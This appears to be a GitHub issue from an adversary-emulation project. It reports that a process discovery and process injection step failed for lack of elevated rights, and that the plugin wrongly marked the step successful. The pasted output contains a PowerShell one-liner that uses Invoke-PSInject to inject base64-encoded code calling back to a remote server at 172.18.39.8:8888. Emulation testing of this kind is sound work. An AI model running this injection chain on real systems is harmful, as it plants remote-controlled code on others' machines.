[Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055)
Cyb3rWard0g opened this issue · comments
Good evening,
This issue goes along with the one here: #1 since it has the same setup and operation execution/
As described in the previous issue, I also had two processes running as administrator (right click on cmd and powershell and ran them as Administrator) . I believe since the previous step Phase 9 - 3.A.1 failed as shown in here #1 (bypassUAC), this step could not run properly.
Output:
Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Inject -PoshCode $pcode;
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
Get-Process : The 'IncludeUserName' parameter requires elevated user rights. Try running the command again
in a session that has been opened with elevated user rights (that is, Run as Administrator).
At C:\Users\pgustavo\Invoke-PSInject.ps1:3583 char:5
+ Get-Process -IncludeUserName | Where-Object { $_.UserName -like " ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-Process], InvalidOperationException
+ FullyQualifiedErrorId : IncludeUserNameRequiresElevation,Microsoft.PowerShell.Commands.GetProcessComm
and
According to the description of this step:
BypassUAC failed first, so it makes sense I guess that this step did not work.
One thing to mention too is that the plugin says that Phase 10 - 3.B.1 step ran successfully. However, as shown above, it did not. A screen shot:
Thank you in advance!